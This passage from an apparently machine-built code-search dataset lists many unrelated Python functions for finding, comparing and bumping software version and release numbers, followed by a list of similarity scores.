pre = VersionUtils.process_major(\n dev, major, micro, minor, post, pre\n )\n\n # Handle Epoch\n if release_type == \"epoch\":\n dev, epoch, major, micro, minor, post, pre = VersionUtils.process_epoch(\n dev, epoch, major, micro, minor, post, pre\n )\n\n local = \"\".join(v[5] or []) or None\n\n version_list = [major, minor, micro]\n if release_type not in [\"epoch\", \"major\", \"minor\", \"micro\", \"pre\"]:\n version_list += list(v[1][3:])\n version_string = \".\".join([str(x) for x in version_list if x or x == 0])\n\n if epoch:\n version_string = str(epoch) + epoch_name + version_string\n if pre is not None:\n version_string = VersionUtils.calc_pre_version_string(\n pre, pre_name, version_string\n )\n if post is not None:\n version_string += \".\" + post_name + str(post)\n if dev is not None:\n version_string += \".\" + dev_name + str(dev)\n if local is not None:\n version_string += \".\" + str(local)\n\n return version_string", "def latest(cls):\n releases = cls.query.all()\n if len(releases) == 0:\n return None\n\n releases.sort(key=lambda x: x.version)\n return releases[-1]", "def get_new_version(version, IS_ARCHIVE, IS_RELEASE):\n\n if not IS_ARCHIVE and not IS_RELEASE:\n return version\n\n version_split = version.split('.')\n version_split_sigfigs = len(version_split)\n\n # ARCHIVE\n if IS_ARCHIVE:\n if version_split_sigfigs == 2:\n version_split[1] = str(0)\n else:\n del version_split[-1]\n version = \".\".join(version_split)\n return version\n\n # Release\n else:\n version_split[version_split_sigfigs-1] = str(int(version_split[version_split_sigfigs-1]) + 1)\n return \".\".join(version_split)", "def latest_release_get():\n try:\n return json_response.success({'version': version.latest_version()})\n except version.Error as e:\n return json_response.error(str(e)), 200", "def get_latest_vsn(self):\n # The last version in the list should be the newest one.\n if len(self.versions) > 0:\n v = sorted(self.versions, key=lambda v: int(v['id']))[len(self.versions)-1]\n return self.get_version(v['id'])\n else: return None", "def 
latest_version(self):\n from leonardo_system.pip import check_versions\n return check_versions(True).get(self.name, None).get('new', None)", "def latest_version_number(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"latest_version_number\")", "def test_get_next_version_MINOR(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR + 1, MAJOR, MINOR + 1, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual('%d.%d-%d' % (MAJOR, MINOR + 1, 0), ver)", "def version_max():\n return VERSION_MAX", "def test_getNextVersion(self):\n now = date.today()\n major = now.year - VERSION_OFFSET\n version = Version(\"twisted\", major, 9, 0)\n self.assertEquals(getNextVersion(version, now=now),\n Version(\"twisted\", major, 10, 0))", "def latest_version(self):\n state = self.coordinator.data\n\n try:\n # fake a new update\n # return \"foobar\"\n return dict_get(state, \"firmware_update_info.base.version\")\n except KeyError:\n return None", "def get_version():\n click.echo(get_current_version_number())", "def previous():\n releases_list = releases()\n try:\n return releases_list[-2]\n except IndexError:\n return None", "def get_last_version(self):\n version = self.get_current_version()\n\n # read the recent file list\n if version is None:\n version = self.get_version_from_recent_files()\n\n return version", "def get_version(self):\r\n\r\n return self.versions[0].number", "def get_recent_release_from_product_details() -> int:\n rls_prod_details_json = get(\n \"https://product-details.mozilla.org/1.0/firefox_history_major_releases.json\"\n ).json()\n rls_prod_details = Series(rls_prod_details_json).sort_values(ascending=True)\n [(cur_rls_vers, _date)] = rls_prod_details[-1:].iteritems()\n cur_rls_maj, *_v = cur_rls_vers.split(\".\")\n return int(cur_rls_maj)", "def test_release_update_available_MINOR(self):\n NEXT = '%d.%d-%d' % (MAJOR, MINOR + 1, 0)\n self._uri({\n '%d.%d/maintained/%s/all/Packages.gz' % (MAJOR, MINOR + 1, NEXT): DATA,\n })\n next = self.u.release_update_available()\n self.assertEqual(NEXT, next)", "def select_release():\n release_version = unitdata.kv().get(OPENSTACK_RELEASE_KEY, None)\n if release_version is None:\n release_version = os_utils.os_release('keystone')\n unitdata.kv().set(OPENSTACK_RELEASE_KEY, release_version)\n return release_version", "def current_version(self):\n if self.current_tag:\n version = self.current_tag.lstrip('v')\n else:\n version = None\n\n if version and not version_is_valid(version):\n version = None\n\n return version", "def test_get_next_version(self):\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual(None, ver)", "def test_release_update_available_MAJOR(self):\n NEXT = '%d.%d-%d' % (MAJOR + 1, 0, 0)\n self._uri({\n '%d.%d/maintained/%s/all/Packages.gz' % (MAJOR + 1, 0, NEXT): DATA,\n })\n next = self.u.release_update_available()\n self.assertEqual(NEXT, next)", "def last_available_os_version(self) -> str:\n return pulumi.get(self, \"last_available_os_version\")", "def switch_to_latest_version(self):\n self.current_version = Version.objects.filter(is_published=True).latest()\n self.save()", "def current_version(self):\n try:\n return self.versions.latest()\n except DocumentVersion.DoesNotExist:\n return None", "def get_version():\n return 1", "def minor_version(self) -> str:\n return pulumi.get(self, \"minor_version\")", "def version(self):\n self.version_list[-1] = self.revision\n version = '.'.join(self.version_list)\n return version", 
"def _get_next_work_file_version(self, work_template, fields):\n existing_versions = self.parent.tank.paths_from_template(work_template, fields, [\"version\"])\n version_numbers = [work_template.get_fields(v).get(\"version\") for v in existing_versions]\n curr_v_no = fields[\"version\"]\n max_v_no = max(version_numbers)\n return max(curr_v_no, max_v_no) + 1", "def latest_product_version(product):\n return product.productversions.order_by(\"-created_on\").first()", "def get_reversion():\n return to_str(backend.get().af_get_revision())", "def next_available_version(self):\n pattern = \"{descriptor}_{task}_v*{ext}\".format(\n descriptor=self.descriptor, task=self.task, ext=self.extension)\n matching_scenefiles = []\n try:\n for file_ in self.folder_path.files():\n if file_.name.fnmatch(pattern):\n matching_scenefiles.append(file_)\n if not matching_scenefiles:\n return 1\n except OSError as err:\n return 1\n matching_scenefiles.sort()\n latest_scenefile = matching_scenefiles[-1]\n latest_version = latest_scenefile.name.stripext().split(\"_v\")[-1]\n return int(latest_version) + 1", "def get_latest_version(self):\n try:\n version = self.sourcestudyversion_set.filter(\n i_is_deprecated=False\n ).order_by( # We can't use \"latest\" since it only accepts one field in Django 1.11.\n '-i_version',\n '-i_date_added'\n ).first()\n except ObjectDoesNotExist:\n return None\n return version", "def read_release_version():\n with open(\"RELEASE-VERSION\", \"r\") as f:\n return f.readline().strip()", "def get_latest_schemaorg_version():\n tag_name = requests.get(SCHEMAORG_VERSION_URL).json()[\"tag_name\"] # \"v13.0-release\"\n mat = re.match(r\"v([\\d.]+)-release\", tag_name)\n if not mat:\n raise ValueError(f\"Unrecognized release tag name {tag_name}\")\n latest = mat.group(1)\n return latest", "def get_version():\n return '%d.%d.%d' % version_info", "def commcare_minor_release(self):\n return '%d.%d' % self.build_spec.minor_release()", "async def fetch_data(self) -> GitHubReleaseModel | None:\n result = await self._client.repos.releases.list(\n self.repository, **{\"params\": {\"per_page\": 1}}\n )\n if not result.data:\n return None\n\n for release in result.data:\n if not release.prerelease:\n return release\n\n # Fall back to the latest release if no non-prerelease release is found\n return result.data[0]", "def get_latest_ml_pipeline_version() -> str:\n\n return execute_query('''\n SELECT pipeline_version\n FROM ml_pipeline\n ORDER BY created_at DESC\n LIMIT 1\n ''')[0][0]", "def test_get_next_version_PATCH(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR, MAJOR, MINOR, PATCH + 1): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual('%d.%d-%d' % (MAJOR, MINOR, PATCH + 1), ver)", "def version(self):\n self._get_latest_content()\n return self._data.get('version', None)", "def get_version():\n git_root = find_git_root(dirname(__file__))\n\n if git_root is not None:\n # Get the version using \"git describe\".\n cmd = \"git describe --tags --match [0-9]*\".split()\n try:\n version = subprocess.check_output(cmd).decode().strip()\n except subprocess.CalledProcessError:\n logger.exception(\"Unable to get version number from git tags\")\n exit(1)\n\n # PEP 386 compatibility\n if \"-\" in version:\n version = \".post\".join(version.split(\"-\")[:2])\n\n # Don't declare a version \"dirty\" merely because a time stamp has\n # changed. 
If it is dirty, append a \".dev1\" suffix to indicate a\n # development revision after the release.\n with open(os.devnull, \"w\") as fd_devnull:\n subprocess.call([\"git\", \"status\"], stdout=fd_devnull, stderr=fd_devnull)\n\n cmd = \"git diff-index --name-only HEAD\".split()\n try:\n dirty = subprocess.check_output(cmd).decode().strip()\n except subprocess.CalledProcessError:\n logger.exception(\"Unable to get git index status\")\n exit(1)\n\n if dirty != \"\":\n version += \".dev1\"\n\n return version\n\n else:\n try:\n return pkg_resources.working_set.by_key[\"graphql-validate\"].version\n except KeyError:\n return \"0.0.0-unreleased\"", "def getDBReleaseVersion(dbh, jobPars):\n\n return dbh.getDBReleaseVersion(jobPars=jobPars)", "def update_version() -> str:\n cur_version = get_current_version(args.stage)\n\n if args.stage == \"prod\":\n prv_version = get_current_version(stage='staging')\n new_version = semver.finalize_version(prv_version)\n elif args.stage == \"staging\":\n prv_version = get_current_version(stage='integration')\n assert '-integration' in prv_version\n new_version = prv_version.replace('-integration', '-rc') # don't bump the version number\n else:\n new_version = getattr(semver, f'bump_{args.release}')(str(cur_version))\n new_version = new_version if semver.parse_version_info(new_version).prerelease \\\n else semver.bump_prerelease(new_version, token='integration')\n\n if cur_version == new_version:\n print(\"Nothing to promote\")\n exit(0)\n else:\n print(f\"Upgrading: {cur_version} -> {new_version}\")\n return new_version", "def get_previous_release_info(\n previous_release_version: str | None, past_releases: list[ReleaseInfo], current_release_version: str\n) -> str | None:\n previous_release = None\n if previous_release_version == current_release_version:\n # Re-running for current release - use previous release as base for git log\n if len(past_releases) > 1:\n previous_release = past_releases[1].last_commit_hash\n else:\n previous_release = past_releases[0].last_commit_hash if past_releases else None\n return previous_release", "def GetApiVersion(cls):\n if cls.ReleaseTrack() == base.ReleaseTrack.ALPHA:\n return 'alpha'\n elif cls.ReleaseTrack() == base.ReleaseTrack.BETA:\n return 'beta'\n return 'v1'", "def get_current_version(self) -> str:\n raise NotImplementedError()", "def get_latest_tf_version(include_prerelease: bool = False) -> str:\n return get_available_tf_versions(include_prerelease)[0]", "def get_last_version(self):\n version = self.get_current_version()\n\n # read the recent file list\n if version is None:\n version = self.get_version_from_recent_files()\n\n # get the latest possible Version instance by using the workspace path\n if version is None:\n version = self.get_version_from_project_dir()\n\n return version", "def next_release_date(date):\n df = get_release_dates()\n df = df[df['ReleaseDate'] > date]\n return df['ReleaseDate'].iloc[0]", "async def get_latest_version(self, pkg: str) -> Optional[str]:\n return None", "def test_get_next_version_PATCH99(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR, MAJOR, MINOR, 100): '',\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR + 1, MAJOR, MINOR + 1, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, 99)))\n self.assertEqual('%d.%d-%d' % (MAJOR, MINOR + 1, 0), ver)", "def calculate_new_release_version(version):\n split_version_string = version.split(\".\")\n part_zero = split_version_string[0]\n part_one = int(split_version_string[1]) + 1\n part_two = 
split_version_string[2]\n new_version = f\"{part_zero}.{part_one}.{part_two}\"\n return new_version", "def get_version():\n\n with open('__init__.py') as f:\n for line in f.readlines():\n if '__version__' in line:\n apicem_version = line.strip().split(\"=\")[-1].strip(\" '\")\n if '__first_release_date__' in line:\n first_release_data_str = line.strip().split(\"=\")[-1].strip(\" '\")\n first_release_data = date(*[int(num) for num in first_release_data_str.split('.')])\n num_commits = get_cr_num(first_release_data)\n return '{apicem_version}.{num_commits}'.format(\n apicem_version=apicem_version, num_commits=num_commits)\n\n raise ValueError(\"could not read version\")", "def get_version():\r\n return __version__", "def get_max_build_version(version: str) -> str:\n return Version(version).bump_minor().get_stable().dumps()", "def get_version(self):\n\t\treturn call_sdk_function('PrlApi_GetVersion')", "def test_release_update_available_PATCH(self):\n NEXT = '%d.%d-%d' % (MAJOR, MINOR, PATCH + 1)\n self._uri({\n '%d.%d/maintained/%s/all/Packages.gz' % (MAJOR, MINOR, NEXT): DATA,\n })\n next = self.u.release_update_available()\n self.assertEqual(NEXT, next)", "def get_version():\n vers = [\"%(major)i.%(minor)i\" % __version_info__, ]\n\n if __version_info__['micro']:\n vers.append(\".%(micro)i\" % __version_info__)\n if __version_info__['releaselevel'] != 'final':\n vers.append('%(releaselevel)s' % __version_info__)\n return ''.join(vers)", "def _get_version(self):", "def get_current_version(self):\n raise NotImplementedError(\"get_current_version is not implemented\")", "def engine_version(self) -> Optional[str]:\n return pulumi.get(self, \"engine_version\")", "def get_default_version(self):\n # latest is a special case where we don't have to check if it exists\n if self.default_version == 'latest':\n return self.default_version\n # check if the default_version exists\n version_qs = self.versions.filter(\n slug=self.default_version,\n active=True\n )\n if version_qs.exists():\n return self.default_version\n return 'latest'", "def main(self):\n logging.info(\"Doing release for %s\", self.version.raw)\n\n if self.version.branch is None:\n logging.debug(\"No branch, assuming '%s'. Override with --branch.\",\n self.options.branch)\n self.version.branch = self.options.branch\n\n # No version specified, assuming a snapshot release\n if self.options.version is None:\n self.do_release(\n version=MwVersion.new_snapshot(self.options.branch))\n return 0\n\n if self.options.previousversion:\n # Given the previous version on the command line\n self.do_release(version=self.version)\n return 0\n\n no_previous = False\n if self.version.prev_version is None:\n no_previous = True\n if not self.ask(\"No previous release found. 
Do you want to make a \"\n \"release with no patch?\"):\n logging.error('Please specify the correct previous release ' +\n 'on the command line')\n return 1\n if no_previous or self.options.no_previous:\n self.do_release(version=self.version)\n else:\n if not self.ask(\"Was %s the previous release?\" %\n self.version.prev_version):\n logging.error('Please specify the correct previous release ' +\n 'on the command line')\n return 1\n\n self.do_release(version=self.version)\n return 0", "def version(self):\n\n if self.running() is True:\n return APIConsumer.get(\"/version\").content\n else:\n return None", "def get_version():\n return __version__", "def get_version():\n return __version__", "def get_version():\n return __version__", "def release(self) -> pulumi.Output['outputs.ReleaseResponse']:\n return pulumi.get(self, \"release\")", "def test_getNextVersionAfterYearChange(self):\n now = date.today()\n major = now.year - VERSION_OFFSET\n version = Version(\"twisted\", major - 1, 9, 0)\n self.assertEquals(getNextVersion(version, now=now),\n Version(\"twisted\", major, 0, 0))", "def get_revision(self):\n vers = self.send(\"?R\", recv=True)\n # Verify its a valid version\n # ? why was this commented out\n float(vers)\n # But return as string to avoid precision issues\n return vers", "def get_distrib_version():\n distrib, version, codename = _get_release_infos() \n return version", "def get_version(self):\n return self.version", "def test_get_next_version_MAJOR(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR + 1, 0, MAJOR + 1, 0, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual('%d.%d-%d' % (MAJOR + 1, 0, 0), ver)", "def get_latest_release_id(self, application_id):\n release_id = -1\n releases = self.get_releases_by_application(application_id)\n\n if not releases.items:\n return release_id\n\n for release in releases.items:\n if (release_id < release.release_id and\n 'Completed' == release.current_analysis_status_type):\n release_id = release.release_id\n\n return release_id", "def get_version(self):\r\n return self._arm.get_version()", "def _next_version(self, dirpath: str) -> int:\n try:\n version_re = re.compile(r\"version_(\\d+)\")\n\n def is_valid_version(v: str):\n return version_re.search(v) is not None\n\n versions = tuple(filter(is_valid_version, os.listdir(dirpath)))\n if not versions:\n # No versions yet\n return 0\n current_version = natsorted(versions, reverse=True)[0]\n # Get the version number using the version pattern\n current_version = int(version_re.search(current_version).group(1))\n return current_version + 1\n except Exception as e:\n logger.warning(f\"Starting from version 0 because of error: {e}\")\n return 0", "def get_version(self):\n return self.cur_config['version']['name']", "def latest_github_tag():\n release_tags_github_url = \"https://api.github.com/repos/rackerlabs/openstack-guest-agents-unix/tags\"\n release_tags_json = urllib2.urlopen(release_tags_github_url)\n release_tags_data = json.load(release_tags_json)\n return str(release_tags_data[0]['name'])[1:]", "def getPreviousBuild():", "def save_increment(self):\n self.version = self.next_available_version()\n return self.save()", "def version(self) -> Optional[str]:\n return pulumi.get(self, \"version\")", "def version(self) -> Optional[str]:\n return pulumi.get(self, \"version\")", "def version(self) -> Optional[str]:\n return pulumi.get(self, \"version\")" ]
[ "0.74370474", "0.7424086", "0.7209765", "0.7072295", "0.68549937", "0.68467635", "0.6822434", "0.6782135", "0.675786", "0.6439284", "0.64025617", "0.6362353", "0.6344141", "0.63141763", "0.6309239", "0.6289336", "0.6222575", "0.610926", "0.6093002", "0.60867167", "0.6048308", "0.60249436", "0.60151535", "0.5974705", "0.59424496", "0.5940804", "0.5930821", "0.59263897", "0.59194994", "0.5912126", "0.5899272", "0.58882505", "0.5861875", "0.5853393", "0.5832562", "0.5818481", "0.58079565", "0.57782865", "0.57638115", "0.5761821", "0.5747232", "0.5728893", "0.5696332", "0.5683644", "0.5670163", "0.5665485", "0.56644344", "0.56632596", "0.565963", "0.5652015", "0.56420606", "0.56337273", "0.5627977", "0.5619189", "0.56117076", "0.56046677", "0.56010824", "0.5593114", "0.5586504", "0.5584942", "0.5570424", "0.5567353", "0.5558816", "0.5549726", "0.55468494", "0.5534981", "0.5534177", "0.55275595", "0.55268663", "0.55196786", "0.55180436", "0.55112773", "0.55066454", "0.54990023", "0.5497661", "0.549689", "0.5495849", "0.54928786", "0.5488536", "0.548553", "0.54835016", "0.5478099", "0.5478099", "0.5478099", "0.54747325", "0.5472497", "0.54652214", "0.5464758", "0.54428816", "0.54298997", "0.54068846", "0.54001963", "0.53999424", "0.539585", "0.5395001", "0.5393988", "0.538641", "0.5384663", "0.5384663", "0.5384663" ]
0.68445814
6
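Worked example (an annotation between rows, not a dataset row itself): the positive document of the row above bumps a PEP 440 post-release segment. A minimal standalone sketch of the same idea built only on packaging.version — the helper name and the simplified edge-case handling here are illustrative assumptions, not the dataset's own implementation, which works on an internal BaseVersion tuple:

from packaging.version import Version

def bump_postrelease(version: str, inc: int = 1) -> Version:
    # Increment the PEP 440 post segment: 1.2.3 -> 1.2.3.post1,
    # 1.2.3.post1 -> 1.2.3.post2 (simplified relative to the row above,
    # which additionally clamps an existing post0 up to post1 first).
    v = Version(version)
    post = (v.post or 0) + max(inc, 1)
    release = ".".join(str(n) for n in v.release)
    return Version(f"{release}.post{post}")

assert str(bump_postrelease("1.2.3")) == "1.2.3.post1"
assert str(bump_postrelease("1.2.3.post1")) == "1.2.3.post2"

Dropping pre/dev/local segments in the rebuilt string mirrors what the row's document does by passing pre=None, dev=None, local=None into its replacement version.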
Whether version is not prerelease or devrelease.
def is_stable(self) -> bool: return not self.is_prerelease
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def is_release():\n return VERSION[-1]", "def is_release(self):\n # version string: N.N.N.N is for release.\n return bool(re.match(r'^[\\d.]+$', self.version))", "def is_production(version=None):\n return is_host_google() and is_default_version(version)", "def is_0_release(release: str) -> bool:\n if release == \"current_branch\":\n return False\n version = packaging.version.parse(release)\n return version < packaging.version.Version(\"1.0\")", "def is_dev(version):\n return re.match(r'^.*\\.dev\\d+$', version)", "def version_is_full_release(version_string):\n match = VERSION_REGEX.match(version_string)\n\n if match and match.groupdict()[\"modifier\"] == \"\":\n return True\n else:\n return False", "def test_release_tag_for_dev_version(self) -> None:\n self.assertEqual(\"v42.12\", release_tag())", "def has_prerelease(req):\n return any(parse_version(spec.version).is_prerelease for spec in req.specifier)", "def is_staging(version=None):\n return is_host_google() and not is_default_version(version)", "def is_devel(self):\r\n\r\n return self.is_debug()", "def is_release_branch():\n diff_string_config_yml = run_command(\"git diff origin/master .circleci/config.yml\")\n if re.search(r'[+-][ ]+CONTENT_VERSION: \".*', diff_string_config_yml):\n return True\n\n return False", "def is_version_2_6() -> bool:\n v = get_version()\n if v[1] != \"singularity\" and v[1] != \"singularity-ce\":\n return False\n return v[0][0] == 2 and v[0][1] == 6", "def keep_old(ver: str) -> bool:\n ver = travis_normalize_py_version(ver)\n if ver == 'PyPy':\n return any(v.startswith('2') for v in new_versions)\n if ver == 'PyPy3':\n return any(v.startswith('3') for v in new_versions)\n return not is_important(ver)", "def is_version_3_4_or_newer() -> bool:\n if is_apptainer_1_or_newer():\n return True # this is equivalent to singularity-ce > 3.9.5\n v = get_version()\n return v[0][0] >= 4 or (v[0][0] == 3 and v[0][1] >= 4)", "def is_version_3_or_newer() -> bool:\n if is_apptainer_1_or_newer():\n return True # this is equivalent to singularity-ce > 3.9.5\n v = get_version()\n return v[0][0] >= 3", "def test_check_version_non_release(self):\n with self.assertLogs(\"dakara_feeder.version\", \"DEBUG\") as logger:\n with patch.multiple(\n \"dakara_feeder.version\", __version__=\"0.1.0-dev\", __date__=\"1970-01-01\"\n ):\n check_version()\n\n # assert effect on logs\n self.assertListEqual(\n logger.output,\n [\n \"INFO:dakara_feeder.version:\" \"Dakara feeder 0.1.0-dev (1970-01-01)\",\n \"WARNING:dakara_feeder.version:\"\n \"You are running a dev version, use it at your own risks!\",\n ],\n )", "def prod(environment):\n return environment == 'live' or environment == 'debug' or environment == 'prod'", "def is_version_3_1_or_newer() -> bool:\n if is_apptainer_1_or_newer():\n return True # this is equivalent to singularity-ce > 3.9.5\n v = get_version()\n return v[0][0] >= 4 or (v[0][0] == 3 and v[0][1] >= 1)", "def is_valid_version(self):\n pass", "def is_on(self) -> bool:\n current = self.coordinator.data.info.version\n beta = self.coordinator.data.info.version_latest_beta\n stable = self.coordinator.data.info.version_latest_stable\n\n return current is not None and (\n (stable is not None and stable > current)\n or (\n beta is not None\n and (current.alpha or current.beta or current.release_candidate)\n and beta > current\n )\n )", "def test_release_tag(self) -> None:\n self.assertEqual(\"v3.14.15\", release_tag())", "def is_dev_version(cls):\n\n # We initiate the command we have to run in order to\n # get the branch we are 
currently working with.\n command = \"git branch\"\n\n # We execute and get the command output.\n command_result = PyFunceble.helpers.Command(command).execute()\n\n for branch in command_result.split(\"\\n\"):\n # We loop through each line of the command output.\n\n if branch.startswith(\"*\") and (\"dev\" in branch or \"3.x\" in branch):\n # The current branch is `dev`.\n\n # We return True.\n return True\n\n # The current branch is not `dev`.\n\n # We return False.\n return False", "def test_os_release(self):\n self.assertEqual(self.settings.OS_RELEASE, platform.release())", "def distributionRequiresNoTtyPatch():\n\tdistributor = Distribution().distributor.lower()\n\n\treturn bool('redhat' in distributor or 'centos' in distributor)", "def test_pre_release(scraper, version_parts):\n\n new_version_parts = list(version_parts)\n if len(new_version_parts) > 4:\n new_version_parts[4] = int(new_version_parts[4]) + 1\n elif len(new_version_parts) > 3:\n new_version_parts.append(1)\n else:\n new_version_parts.extend(['a', 1])\n\n assert scraper.is_compatible_with(generate_version(new_version_parts)) is True", "def has_set_up_py_in(self):\n return (self.version_info >= (4, 10))", "def no_prereq_install():\n return str2bool(os.environ.get('NO_PREREQ_INSTALL', 'False'))", "def test_changeVersionsWithPrerelease(self):\n self._testVersionChanging(9, 2, 7, 38)", "def warn_default(version):\r\n if config.warn.ignore_bug_before == 'None':\r\n return True\r\n if config.warn.ignore_bug_before == 'all':\r\n return False\r\n if config.warn.ignore_bug_before >= version:\r\n return False\r\n return True", "def dev(self) -> bool:\n return \"d\" in self.modifier if self.modifier else \"dev\" in self.string", "def good_py_version() -> bool:\n return sys.version_info.major >= 3 and sys.version_info.minor >= 6", "def devel(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"devel\")", "def exists():\n return PYTHON_VERSION is not None", "def fix_has_no_advisory(self):\n fixed_in = self.fixed_artifact()\n return fixed_in and fixed_in.vendor_no_advisory", "def is_hide_prod_version_enabled(cluster_config):\n\n cluster = load_cluster_config_json(cluster_config)\n try:\n return cluster[\"environment\"][\"hide_product_version\"]\n except KeyError:\n return False", "def in_travis_pr():\n # NOTE: We're a little extra cautious and make sure that the\n # PR environment variable is an integer.\n try:\n int(os.getenv(TRAVIS_PR_ENV, ''))\n return True\n except ValueError:\n return False", "def on_production(self):\n\n if not self.is_valid_platform() and not self.in_build():\n return False\n prod_branch = 'production' if self.on_dedicated() else 'master'\n return self['BRANCH'] == prod_branch", "def no_afni():\n if Info.version() is None:\n return True\n return False", "def isProduction(obj):\n return 'PROD' in obj.tags # This is deprecated? 
obj.tags.has_key('PROD')", "def is_apptainer_1_or_newer() -> bool:\n v = get_version()\n if v[1] != \"apptainer\":\n return False\n return v[0][0] >= 1", "def check_version_str(version):\n if not version.startswith('v') and version != 'current':\n version = 'v%s' % version\n return version", "def oskernel_isgreater(self, version):\n match = re.search(r\"([0-9.]+)\", self.oskernel())\n if match:\n os_release = match.group(1)\n else:\n return True\n\n for (idx, os_version) in enumerate(os_release.split('.')):\n if idx >= len(version):\n break\n if int(os_version) > int(version[idx]):\n return True\n if int(os_version) < int(version[idx]):\n return False\n\n return True", "def skip_check():\n if os.getenv('LEAPP_DEVEL_SKIP_CHECK_OS_RELEASE'):\n reporting.create_report([\n reporting.Title('Skipped OS release check'),\n reporting.Summary('Source RHEL release check skipped via LEAPP_DEVEL_SKIP_CHECK_OS_RELEASE env var.'),\n reporting.Severity(reporting.Severity.HIGH),\n reporting.Groups(COMMON_REPORT_TAGS)\n ] + related)\n\n return True\n return False", "def is_default_version(version=None):\n version = version or get_current_version_name()\n return version == get_default_version()", "def get_release_version(self):\n return self.get_property(ADB.VERSION_RELEASE_PROPERTY)", "def get_version():\n return \"0.0.1 (prerelease prototype)\"", "def compatible_version(self):\n note_version = self.py_version\n py_version = sys.version_info\n if note_version[0] != py_version[0]:\n return False\n if len(note_version) > 1 and note_version[1] > py_version[1]:\n return False\n return True", "def is_version_valid(version):\n return _compiled_version_regex.match(version) is not None", "def devel(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"devel\")", "def _does_require_deprecation(self):\n\n for index, version_number in enumerate(self.current_version[0][:2]):\n # We loop through the 2 last elements of the version.\n\n if version_number > self.version_yaml[index]:\n # The currently read version number is greater than the one we have in\n # the version.yaml.\n\n # We return True.\n return True\n\n # We return False, we do not need to deprecate anything.\n return False", "def is_pinned_version(version):\n return is_valid_instance_id(version) or is_valid_tag(version)", "def check_image_version(duthost):\n skip_release(duthost, per_command_check_skip_versions)", "def is_requested_version_specified(self):\n return self.requested_version > FlexibleVersion(VERSION_0)", "def in_build(self):\n\n return self.is_valid_platform() and not self['ENVIRONMENT']", "def is_valid_version(self) -> bool:\n return self._is_valid_version()", "def test_release_version():\n pkg_vars = {}\n with open(VERSION_FILE) as f:\n exec(f.read(), pkg_vars) # nosec\n project_version = pkg_vars[\"__version__\"]\n assert (\n RELEASE_TAG == f\"v{project_version}\"\n ), \"RELEASE_TAG does not match the project version\"", "def get_version():\n return 1", "def test_check_version_release(self):\n with self.assertLogs(\"dakara_feeder.version\", \"DEBUG\") as logger:\n with patch.multiple(\n \"dakara_feeder.version\", __version__=\"0.0.0\", __date__=\"1970-01-01\"\n ):\n check_version()\n\n # assert effect on logs\n self.assertListEqual(\n logger.output,\n [\"INFO:dakara_feeder.version:\" \"Dakara feeder 0.0.0 (1970-01-01)\"],\n )", "def test_is_not_local_dev(self):\n\n expected = False\n actual = Version.is_local_dev()\n\n self.assertEqual(expected, actual)", "def get_current_release():\n return _CURRENT_RELEASE", "def 
is_proprietary():\n return False", "def is_developer(self):\n return int(self.developer_status) == 2", "def is_development():\n return os.environ.get('SERVER_SOFTWARE', '').startswith('Development')", "def get_prerelease_package_version(self, production: bool = False) -> str:\n rc = 1\n if describe := get_git_describe(CONFIG.mpy_path.as_posix()):\n ver, rc, _ = describe.split(\"-\")\n base = bump_version(Version(ver), minor_bump=True)\n rc = int(rc)\n return str(bump_version(base, rc=rc))\n else:\n raise ValueError(\"cannot determine next version number micropython\")", "def get_version():\n vers = [\"%(major)i.%(minor)i\" % __version_info__, ]\n\n if __version_info__['micro']:\n vers.append(\".%(micro)i\" % __version_info__)\n if __version_info__['releaselevel'] != 'final':\n vers.append('%(releaselevel)s' % __version_info__)\n return ''.join(vers)", "def update_pkg_version(self, production: bool) -> str:\n return (\n self.get_prerelease_package_version(production) if self.mpy_version == \"latest\" else self.get_next_package_version(production)\n )", "def __getNullVersion(self):\n print(\"Can't get version\")\n return \"unknownVendor\", \"unknownRelease\"", "def run_in_apache():\n return CompareOpenStackReleases(os_release('keystone')) >= 'liberty'", "def in_valid_context(package):\n return os.getenv(\"REZ_{name}_VERSION\".format(name=package.name.upper())) == str(\n package.version\n )", "def python_build():\n return _sys_version()[4:6]", "def isDBReleaseFile(dbh, lfn):\n\n if dbh:\n return dbh.extractVersion(lfn)\n else:\n return False", "def is_valid_version(version):\n return bool(\n is_valid_instance_id(version) or\n is_valid_tag(version) or\n REF_RE.match(version)\n )", "def has_composed_rpm_bulid_libs(self):\n return self.version_info >= (4, 9, 0)", "def _is_popt_devel_installed(self):\n raise NotImplementedError('Implement this method.')", "def _does_require_force_update(self):\n\n if self.current_version[0][0] > self.version_yaml[0]:\n # The current version first index is greater than the one we have in the\n # current version.yaml.\n\n # We return True.\n return True\n\n # We return False, we do not need to force the update for\n # the current version number.\n return False", "def test_release_update_available_NO(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/all/Packages.gz' % (MAJOR, MINOR, MAJOR, MINOR, PATCH): DATA,\n })\n next = self.u.release_update_available()\n self.assertEqual(None, next)", "def check_if_release_version_ok(\n past_releases: list[ReleaseInfo],\n current_release_version: str,\n) -> tuple[str, str | None]:\n previous_release_version = past_releases[0].release_version if past_releases else None\n if current_release_version == \"\":\n if previous_release_version:\n current_release_version = previous_release_version\n else:\n current_release_version = (datetime.today() + timedelta(days=5)).strftime(\"%Y.%m.%d\")\n if previous_release_version:\n if Version(current_release_version) < Version(previous_release_version):\n console.print(\n f\"[red]The release {current_release_version} must be not less than \"\n f\"{previous_release_version} - last release for the package[/]\"\n )\n raise Exception(\"Bad release version\")\n return current_release_version, previous_release_version", "def _is_version_greater(self):\n\n # we compare the 2 versions.\n checked = PyFunceble.abstracts.Version.compare(\n 